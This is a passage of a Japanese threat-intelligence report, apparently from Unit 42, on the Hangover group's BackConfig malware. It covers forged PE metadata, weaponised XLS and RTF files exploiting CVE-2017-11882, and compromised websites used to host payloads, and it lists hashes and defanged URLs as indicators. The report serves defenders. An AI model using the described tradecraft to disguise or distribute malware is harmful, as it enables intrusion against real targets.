84e5629...)\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u308b\u30b3\u30f3\u30d1\u30a4\u30eb\u65e5\u6642\u306f\u3001\u5f0a\u793e\u306eWildFire\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u306b\u3088\u3063\u3066\u521d\u3081\u3066\u78ba\u8a8d\u3055\u308c\u305f\u65e5\u6642\u3088\u308a\u3082\u5f8c\u3067\u3042\u308b\u3088\u3046\u306b\u898b\u3048\u307e\u3059\u3002PE\u30d5\u30a1\u30a4\u30eb\u306e\u30bf\u30a4\u30e0\u30b9\u30bf\u30f3\u30d7\u304c\u30b3\u30f3\u30d1\u30a4\u30eb\u5f8c\u306b\u5909\u66f4\u3055\u308c\u305f\u53ef\u80fd\u6027\u3082\u3042\u308a\u307e\u3059\u304c\u3001\u3053\u306e\u5947\u5999\u306a\u70b9\u306f\u304a\u305d\u3089\u304f\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u306b\u3088\u3063\u3066\u8aac\u660e\u3067\u304d\u307e\u3059\u3002\u592a\u5e73\u6d0b\u6642\u9593\u306e19\u65e523\u664249\u5206\u306f\u3001\u30d0\u30f3\u30b0\u30e9\u30c7\u30b7\u30e5\u3067\u306f20\u65e5\u306e13\u664249\u5206\u3067\u3059\u3002\u307e\u305f\u3001UTC\u306e\u5348\u524d7\u664226\u5206\u306f\u3001\u5357\u30a2\u30b8\u30a2\u5730\u57df\u3067\u306f11\u664226\u5206\u304b\u308913\u664226\u5206\u307e\u3067\u306e\u7bc4\u56f2\u3067\u3059\u3002\u305d\u3046\u3059\u308b\u3068\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\u306f\u3001\u305d\u306e\u914d\u4fe1\u306e\u76f4\u524d\u306b\u884c\u308f\u308c\u305f\u3053\u3068\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p>\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u306e\u8a73\u7d30\u304a\u3088\u3073\u5b8c\u5168\u306a\u30cf\u30c3\u30b7\u30e5\u306b\u3064\u3044\u3066\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306eIOC\u30bb\u30af\u30b7\u30e7\u30f3\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<p>\u4ee5\u4e0b\u306e\u8868\u306b\u3001\u540c\u3058PE\u30d5\u30a1\u30a4\u30eb\u304b\u3089\u53ce\u96c6\u3057\u3066\u30d5\u30a1\u30a4\u30eb\u8aac\u660e\u30d5\u30a3\u30fc\u30eb\u30c9\u3067\u30b0\u30eb\u30fc\u30d7\u5316\u3057\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u3092\u793a\u3057\u307e\u3059\u3002\u8868\u793a\u9806\u306f\u3001\u30b5\u30f3\u30d7\u30eb(SHA256: 18ce3ee...)\u4ee5\u5916\u306f\u540c\u3058\u3067\u3059\u3002\u30b5\u30f3\u30d7\u30eb(SHA256: 18ce3ee...)\u304c\u6700\u521d\u306b\u78ba\u8a8d\u3055\u308c\u305f\u306e\u306f2020\u5e741\u670816\u65e5\u3067\u3059\u304c\u3001\u4f55\u3089\u304b\u306e\u7406\u7531\u3067\u30012\u30013\u304b\u6708\u524d\u306e\u30b5\u30f3\u30d7\u30eb(\u540d\u524d\u306fLink Finder)\u3067\u78ba\u8a8d\u3055\u308c\u305f\u306e\u3068\u307e\u3063\u305f\u304f\u540c\u3058\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u306b\u623b\u3063\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<table style=\"width: 100%; height: 356px;\">\n<tbody>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px;\"><strong>SHA256<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u30d5\u30a1\u30a4\u30eb\u8aac\u660e<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u30d5\u30a1\u30a4\u30eb\u30d0\u30fc\u30b8\u30e7\u30f3<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u88fd\u54c1\u540d<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u88fd\u54c1\u30d0\u30fc\u30b8\u30e7\u30f3<\/strong><\/td>\n<td style=\"height: 48px;\"><strong>\u8457\u4f5c\u6a29\u60c5\u5831<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px;\">84e5629\u2026<\/td>\n<td style=\"height: 48px;\">\u0410\u043b\u044c\u0431\u0435\u0440\u0442\u00a0<strong>(\u82f1\u8a9e\u3067\u306fAlbert)<\/strong><\/td>\n<td style=\"height: 48px;\">06.10.2015<\/td>\n<td style=\"height: 48px;\">\u0410\u043b\u044c\u0431\u0435\u0440\u0442<\/td>\n<td style=\"height: 48px;\">01.05.2015<\/td>\n<td style=\"height: 48px;\">Copyright @ 2015-2026 secosec<\/td>\n<\/tr>\n<tr style=\"height: 30px;\">\n<td style=\"height: 30px;\">4a4bc01\u2026<\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">\u0421\u0441\u044b\u043b\u043a\u0430<strong>(\u82f1\u8a9e\u3067\u306fLink)<\/strong><\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">01.01.12<\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">\u0441\u0441\u044b\u043b\u043a\u0430<\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">10.01.2015<\/td>\n<td style=\"height: 92px;\" rowspan=\"3\">Copyright @ 2011-2021 secosec Inc. \u0412\u0441\u0435 \u043f\u0440\u0430\u0432\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u044bk\u00a0<strong>(\u82f1\u8a9e\u3067\u306fAll rights reserved)<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 31px;\">\n<td style=\"height: 31px;\">91c67c1\u2026<\/td>\n<\/tr>\n<tr style=\"height: 31px;\">\n<td style=\"height: 31px;\">de5b670\u2026<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">18ce3ee\u2026<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">Link Finder<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">01.01.12<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">Link Finder<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">13,9,1632<\/td>\n<td style=\"height: 72px;\" rowspan=\"3\">Copyright @2011-2020 Techtest Inc. All Rights Reserved<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">f79ebf0\u2026<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">31faeef\u2026<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">d87b875\u2026<\/td>\n<td style=\"height: 24px;\">scrapper<\/td>\n<td style=\"height: 24px;\">01.12.001<\/td>\n<td style=\"height: 24px;\">scrapper<\/td>\n<td style=\"height: 24px;\">13,6,1662<\/td>\n<td style=\"height: 24px;\">Copyright @Scrapper Ltd Reserved<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px;\">1510996\u2026<\/td>\n<td style=\"height: 72px;\">system process<\/td>\n<td style=\"height: 72px;\">2,1,1,2015<\/td>\n<td style=\"height: 72px;\">system process cleaner<\/td>\n<td style=\"height: 72px;\">2,1,1,2015<\/td>\n<td style=\"height: 72px;\">Copyright \u00a9 2004-2018 Foxit Software Inc. All Rights Reserved<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><em>\u88682. PE\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u30e1\u30bf\u30c7\u30fc\u30bf\u306e\u8aac\u660e(\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u9806\u3001\u4e00\u81f4\u30c7\u30fc\u30bf\u306b\u3088\u308a\u30b0\u30eb\u30fc\u30d7\u5316)<\/em><\/span><\/p>\n<p>\u3053\u306e\u4e2d\u3067\u306f\u3001\u30d5\u30a1\u30a4\u30eb(SHA256: 1510996...)\u304c\u3001Foxit\u306e\u8457\u4f5c\u6a29\u60c5\u5831\u3068\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u3092\u4f7f\u7528\u3057\u3066\u3001\u3055\u3089\u306b\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30a4\u30b3\u30f3\u3068\u3057\u3066\u4ee5\u4e0b\u306e\u56f3\u306b\u793a\u3059\u4f01\u696d\u30ed\u30b4\u3092\u4f7f\u7528\u3057\u3066\u304a\u308a\u3001\u30c6\u30fc\u30de\u3068\u3044\u3046\u70b9\u3067\u6700\u3082\u4e00\u8cab\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u306e\u8457\u4f5c\u6a29\u60c5\u5831\u306f\u3001Foxit\u306eReader\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u306e\u8457\u4f5c\u6a29\u60c5\u5831\u3068\u6bd4\u8f03\u3057\u3066\u30d4\u30ea\u30aa\u30c9\u8a18\u53f7\u304c1\u3064\u6b20\u3051\u3066\u3044\u308b\u3060\u3051\u3067\u3042\u308b\u3053\u3068\u304b\u3089\u3001\u4f5c\u6210\u3057\u305f\u306e\u3067\u306f\u306a\u304f\u3001\u30b3\u30d4\u30fc\u3057\u305f\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u653b\u6483\u8005\u306f\u3053\u306e\u5f8c\u3001\u898b\u305f\u3068\u3053\u308d\u67b6\u7a7a\u306e\u4f01\u696d\u540d\u3068\u88fd\u54c1\u540d\u3092\u4f7f\u7528\u3059\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u304c\u3001\u30c7\u30b8\u30bf\u30eb\u7f72\u540d\u3067\u306f\u7f72\u540d\u8005\u306e\u540d\u524d\u3092\u6df7\u305c\u3066\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u904e\u53bb11\u304b\u6708\u9593\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u30a2\u30a4\u30b3\u30f3\u306f\u307e\u3063\u305f\u304f\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<p>\u6700\u8fd1\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u8aac\u660e\u3001\u88fd\u54c1\u540d\u3001\u304a\u3088\u3073\u8457\u4f5c\u6a29\u306e\u5404\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u3001\u4e0a\u8a18\u306e\u8868\u3067\u7ffb\u8a33\u4ed8\u304d\u3067\u793a\u3057\u305f\u3088\u3046\u306b\u3001\u30ad\u30ea\u30eb\u6587\u5b57\u306e\u30c6\u30ad\u30b9\u30c8\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u304c\u3001BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u51fa\u6240\u3092\u3054\u307e\u304b\u305d\u3046\u3068\u3059\u308b\u8a66\u307f\u306a\u306e\u304b\u3001\u305d\u308c\u3068\u3082\u88ab\u5bb3\u7d44\u7e54\u5185\u306e\u7279\u5b9a\u306e\u30bf\u30fc\u30b2\u30c3\u30c8\u306b\u5bfe\u3057\u3066\u3088\u308a\u95a2\u9023\u6027\u306e\u9ad8\u3044\u30b3\u30f3\u30c6\u30f3\u30c4\u306b\u3059\u308b\u305f\u3081\u306e\u8a66\u307f\u306a\u306e\u304b\u3092\u77e5\u308b\u3053\u3068\u306f\u56f0\u96e3\u3067\u3059\u3002<\/p>\n<h3>\u914d\u4fe1\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb<\/h3>\n<p>\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001\u5f0a\u793e\u306e\u9867\u5ba2\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u3067\u78ba\u8a8d\u3057\u305f\u5185\u5bb9\u304a\u3088\u3073\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u306e\u8abf\u67fb\u3092\u901a\u3058\u3066\u78ba\u7acb\u3057\u305f\u60c5\u5831\u306b\u57fa\u3065\u3044\u3066\u3001\u3055\u307e\u3056\u307e\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u914d\u4fe1\u3059\u308b\u65b9\u6cd5\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002Unit 42\u306f\u3001BackConfig\u306e\u914d\u4fe1\u306b\u4f7f\u7528\u3055\u308c\u305f\u5175\u5668\u5316\u3055\u308c\u305f\u6587\u66f8\u304c\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u3001\u30e1\u30fc\u30eb\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u308b\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0URL\u30ea\u30f3\u30af\u304cHangover\u30b0\u30eb\u30fc\u30d7\u306e\u624b\u53e3\u3067\u3042\u308b\u3088\u3046\u306b\u898b\u3048\u308b\u3068\u3044\u3046\u8a3c\u62e0\u306f\u307e\u3060\u78ba\u8a8d\u3057\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<p>\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u306e\u6b8b\u308a\u306e\u90e8\u5206\u3067\u306f\u3001\u4e3b\u306bMicrosoft Excel\u6587\u66f8\u306eOLE\u306b\u6ce8\u76ee\u3057\u307e\u3059\u3002\u306a\u305c\u306a\u3089\u3053\u308c\u306f\u3001\u5c11\u306a\u304f\u3068\u3082BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u3057\u3066\u306f\u3001Hangover\u30b0\u30eb\u30fc\u30d7\u304c\u901a\u5e38\u4f7f\u7528\u3059\u308b\u624b\u6bb5\u3060\u304b\u3089\u3067\u3059\u3002\u3057\u304b\u3057\u3001Unit 42\u306f\u3001\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u5206\u6790\u3092\u901a\u3058\u3066\u3001C2\u30c9\u30e1\u30a4\u30f3matissues[.]com\u3092\u4f7f\u7528\u3057\u3001\u540c\u3058\u65e5\u306b\u5175\u5668\u5316\u3055\u308c\u305fRTF(\u30ea\u30c3\u30c1 \u30c6\u30ad\u30b9\u30c8 \u30d5\u30a9\u30fc\u30de\u30c3\u30c8)\u30d5\u30a1\u30a4\u30eb(SHA256: 752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f)\u306b\u3088\u3063\u3066\u30c9\u30ed\u30c3\u30d7\u3055\u308c\u305f\u3001BackConfig PE\u30b5\u30f3\u30d7\u30eb(SHA256: e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f\u3001\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u306f2019\u5e7410\u670824\u65e5)\u3092\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u306eRTF\u306f\u3001Office\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u5f0f\u30a8\u30c7\u30a3\u30bf\u30fc\u306e\u8106\u5f31\u6027\u306b\u5bfe\u3057\u3066<a href=\"https:\/\/portal.msrc.microsoft.com\/en-US\/security-guidance\/advisory\/CVE-2017-11882\">CVE-2017-11882<\/a>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u4f7f\u7528\u3057\u3066PE\u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u3053\u306e\u60aa\u7528\u65b9\u6cd5\u306f\u3001\u3053\u308c\u307e\u3067\u306b\u5206\u6790\u3057\u305f\u3069\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u3082\u7570\u306a\u308b\u3082\u306e\u3067\u3057\u305f\u3002<\/p>\n<h3>\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/h3>\n<p>\u3053\u308c\u307e\u3067\u306b\u898b\u3064\u3051\u305f\u30b5\u30f3\u30d7\u30eb\u304b\u3089\u53d6\u5f97\u3057\u305f\u30c7\u30fc\u30bf\u3092\u4e2d\u5fc3\u306b\u8abf\u67fb\u3092\u7d9a\u884c\u3057\u305f\u3068\u3053\u308d\u3001BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u914d\u4fe1\u3092\u652f\u63f4\u3059\u308b\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u305f\u3044\u304f\u3064\u304b\u306eURL\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u4ee5\u4e0b\u306e\u8868\u306b\u3001Circular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf)\u3001Circullar_Nov_2017.xls (SHA256: ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb)\u306a\u3069\u306e\u3001(\u305f\u3068\u3048\u30b9\u30da\u30eb\u304c\u9593\u9055\u3063\u3066\u3044\u308b\u3068\u3057\u3066\u3082)\u305d\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u304c\u5927\u52e2\u306e\u4eba\u3005\u306b\u914d\u5e03\u3055\u308c\u308b\u6587\u66f8\u3084\u5e83\u544a\u3067\u3042\u308b\u3001\u307e\u305f\u306f\u305d\u308c\u3089\u306b\u95a2\u9023\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u6301\u3064\u5175\u5668\u5316\u3055\u308c\u305fXLS\u30d5\u30a1\u30a4\u30eb\u3092\u914d\u4fe1\u3057\u3066\u3044\u308b\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30a4\u30c8\u306e\u4f8b\u3092\u3044\u304f\u3064\u304b\u793a\u3057\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>SHA-256<\/strong><\/td>\n<td><strong>\u521d\u56de\u89b3\u6e2c<\/strong><\/td>\n<td><strong>\u95a2\u9023 URL<\/strong><\/td>\n<td><strong>\u8aac\u660e<\/strong><\/td>\n<td><strong>\u5834\u6240<\/strong><\/td>\n<\/tr>\n<tr>\n<td>be3f12b\u2026<\/td>\n<td>2019-10<\/td>\n<td>http:\/\/nsaimmigration[.]com\/userfiles\/image\/fbr.php and nphp_registration_form.php (\u3069\u3061\u3089\u3082HTTP 404)<\/td>\n<td>\u6d77\u5916\u306b\u5728\u7559\u30fb\u7559\u5b66\u3059\u308b\u5b66\u751f\u3092\u652f\u63f4\u3059\u308b\u30b3\u30f3\u30b5\u30eb\u30bf\u30f3\u30c8\u304a\u3088\u3073\u6cd5\u5f8b\u76f8\u8ac7\u306e\u4f01\u696d<\/td>\n<td>\u30d1\u30ad\u30b9\u30bf\u30f3<\/td>\n<\/tr>\n<tr>\n<td>0aa5cf1\u2026<\/td>\n<td>2018-09<\/td>\n<td>http:\/\/webtechhub[.]com\/wordpress\/wp-content\/images\/fbr_circular.php<\/td>\n<td>\u6642\u4ee3\u9045\u308c\u306eWordPress\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308bWeb\u30c7\u30b6\u30a4\u30f3\u30fb\u958b\u767a\u30b5\u30a4\u30c8<\/td>\n<td>\u30d1\u30ad\u30b9\u30bf\u30f3<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\">ed638b5\u2026<\/td>\n<td rowspan=\"2\">2017-11<\/td>\n<td>http:\/\/alphamike.com[.]mv\/housing<\/td>\n<td>\u8ca8\u7269\u306e\u8f38\u9001\u30fb\u914d\u9001\u3092\u884c\u3046\u904b\u9001\u4f1a\u793e<\/td>\n<td>\u30e2\u30eb\u30c7\u30a3\u30d6<\/td>\n<\/tr>\n<tr>\n<td>http:\/\/mgamphs.edu[.]bd\/info\/ (\u505c\u6b62)<\/td>\n<td>Muhurigonj Academy of Music and Performance High School. (<a href=\"https:\/\/twitter.com\/malwrhunterteam\/status\/928619159306555392\">\u53c2\u8003<\/a>)<\/td>\n<td>\u30d0\u30f3\u30b0\u30e9\u30c7\u30b7\u30e5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><em>\u88683. BackConfig\u306e\u914d\u4fe1\u3092\u652f\u63f4\u3059\u308b\u305f\u3081\u306b\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/em><\/span><\/p>\n<p>\u3053\u308c\u3089\u306e\u8105\u5a01\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u6a19\u7684\u304a\u3088\u3073\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u306eWeb\u30b5\u30a4\u30c8\u304b\u3089\u5224\u65ad\u3057\u3066\u3001\u5f0a\u793e\u306f\u3001\u4e0a\u8a18\u306eURL\u306e\u4e00\u90e8\u3067\u300cfbr\u300d\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u306e\u306f\u30d1\u30ad\u30b9\u30bf\u30f3\u306e\u9023\u90a6\u6b73\u5165\u5e81(FBR)\u306b\u95a2\u9023\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3068\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002\u300cfbr\u300d\u3068\u3044\u3046\u30c6\u30fc\u30de\u306f\u3001VBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u3067\u3082\u898b\u3064\u304b\u308a\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30ebed638b5...\u306b\u306f\u3001Const WelcomePage = \"FBR\"\u3068\u3044\u3046\u30b9\u30c6\u30fc\u30c8\u30e1\u30f3\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u88683\u306e\u4fb5\u5bb3\u3055\u308c\u305f\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u306e\u53e4\u3044\u4f8b\u3067\u306f\u3001\u5175\u5668\u5316\u3055\u308c\u305fXLS\u30d5\u30a1\u30a4\u30eb\u3092\u914d\u4fe1\u3059\u308b\u306e\u306b\u30b5\u30fc\u30d0\u30fc\u5074\u306ePHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u305b\u3093\u3002\u4ee3\u308f\u308a\u306b\u3001\u30da\u30fc\u30b8\u3067\u5358\u7d14\u306bHTTP\u5fdc\u7b54\u30b9\u30c6\u30fc\u30bf\u30b9301 (Moved Permantenly)\u3092\u4f7f\u7528\u3057\u3066\u3001\u524d\u8ff0\u306eXLS\u3078\u306eURL\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3092\u5b9f\u884c\u3057\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u6700\u8fd1\u306e\u4f8b\u3067\u306f\u3001\u300cfbr\u300d\u306a\u3069\u306e\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0 \u30c6\u30fc\u30de\u306b\u4e00\u81f4\u3059\u308bURL\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u6301\u3064PHP\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001\u653b\u6483\u8005\u306f\u3001PHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3001\u30da\u30fc\u30b8\u306e\u3042\u3089\u3086\u308b\u8a2a\u554f\u8005\u306b\u3064\u3044\u3066\u30a4\u30d9\u30f3\u30c8\u306e\u30bf\u30a4\u30e0\u30b9\u30bf\u30f3\u30d7\u3001\u30af\u30e9\u30a4\u30a2\u30f3\u30c8 \u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0 \u30b7\u30b9\u30c6\u30e0\u3001\u304a\u3088\u3073IP\u30a2\u30c9\u30ec\u30b9\u3092\u300cinfo.txt\u300d\u3068\u3044\u3046\u540d\u524d\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3093\u3067\u8a18\u9332\u3057\u307e\u3059\u3002<\/p>\n<p>\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u5834\u6240\u307e\u305f\u306f\u305d\u308c\u3089\u3092\u5408\u6cd5\u7684\u306b\u4f7f\u7528\u3059\u308b\u7d44\u7e54\u306f\u3001Unit 42\u304c\u78ba\u8a8d\u3057\u305f\u6a19\u7684\u3068\u6574\u5408\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u307e\u3063\u305f\u304f\u306e\u5076\u7136\u304b\u3001\u8105\u5a01\u653b\u6483\u8005\u304c\u6a19\u7684\u306e\u56fd\u306e\u5927\u898f\u6a21\u306a\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u5229\u7528\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u3059\u5146\u5019\u304b\u3001\u307e\u305f\u306f\u8105\u5a01\u653b\u6483\u8005\u304c\u60f3\u5b9a\u3057\u3066\u3044\u308b\u88ab\u5bb3\u8005\u3068\u305d\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u304c\u3088\u308a\u4fe1\u983c\u3067\u304d\u308b\u3068\u8003\u3048\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u56fd\u5185\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u5229\u7528\u3057\u3066\u3044\u308b\u304b\u306e\u3044\u305a\u308c\u304b\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306eWildFire\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u304c2017\u5e7411\u67088\u65e5\u306b\u30b5\u30f3\u30d7\u30ebed638b5...\u3092\u5206\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u4e0a\u8a18\u306e\u8868\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u30d0\u30f3\u30b0\u30e9\u30c7\u30b7\u30e5\u306e\u5b66\u6821\u3068\u30e2\u30eb\u30c7\u30a3\u30d6\u306e\u904b\u9001\u4f1a\u793e\u306e\u4fb5\u5bb3\u3055\u308c\u305f2\u3064\u306eWeb\u30b5\u30a4\u30c8\u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002Unit 42\u306f\u30e2\u30eb\u30c7\u30a3\u30d6\u8af8\u5cf6\u306b\u304a\u3051\u308bHangover\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u78ba\u8a8d\u3057\u3066\u3044\u307e\u305b\u3093\u304c\u3001\u3053\u306e\u5730\u306f\u4ed6\u306e\u65e2\u77e5\u306e\u6a19\u7684\u3068\u4e26\u3076\u5730\u57df\u306b\u5b58\u5728\u3057\u3001\u8208\u5473\u6df1\u3044\u3053\u3068\u306bUnit 42\u304c\u30b5\u30f3\u30d7\u30eb\u3092\u5206\u6790\u3057\u305f1\u9031\u9593\u5f8c\u306b\u65b0\u5927\u7d71\u9818\u304c\u5ba3\u8a93\u5c31\u4efb\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u30b5\u30f3\u30d7\u30ebed638b5...\u306eVBA\u30b3\u30fc\u30c9\u306b\u3088\u3063\u3066\u4ee5\u4e0b\u306b\u793a\u3059URL\u304b\u3089\u76f4\u63a5\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u305fEXE\u30da\u30a4\u30ed\u30fc\u30c9(SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd)\u306f\u3001BitDefender\u306e<a 